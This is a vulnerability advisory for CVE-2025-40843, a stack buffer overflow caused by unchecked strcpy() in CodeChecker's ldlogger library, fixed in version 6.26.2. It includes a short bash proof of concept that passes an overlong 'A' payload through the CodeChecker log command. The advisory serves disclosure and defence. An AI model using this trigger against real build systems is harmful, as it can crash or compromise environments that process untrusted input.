CVE-2025-40843

Summary

CodeChecker versions up to 6.26.1 contain a buffer overflow vulnerability in the internal ldlogger library, which is executed by the CodeChecker log command.

Details

Unsafe usage of strcpy() function in the internal ldlogger library allows attackers to trigger a buffer overflow by supplying crafted inputs from the command line. Specifically, the destination buffer is stack-allocated with a fixed size of 4096 bytes, while strcpy() is called without any length checks, enabling an attacker to overrun the buffer.

PoC

Example script is included below to illustrate how this vulnerability can be exploited.

#!/bin/bash

export CC_LOGGER_DEF_DIRS=1; 
payload=&#039;&#039;; for i in $(seq 1 4090); do payload+=&#039;A&#039;; done

CodeChecker log -b &quot;/very/long/path/to/$payload/gcc a.c&quot; -o compilation.json

Impact

Any environment where the vulnerable CodeChecker log command is executed with untrusted user input is affected by this vulnerability.

Published: Sep 22, 2025
Updated: Sep 23, 2025
CVE: CVE-2025-40843
GHSA: GHSA-5xf2-f6ch-6p8r
Severity: Medium
Exploit:

CVSS v3:

Severity: Unknown
Score:
AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWEs:

CWE-121

Affected Software
References

Software	From	Fixed in
codechecker	-	6.26.2

Vulnerability Database

CVE-2025-40843

Summary

Details

PoC

Impact

Deep Security Visibility Without the Complexity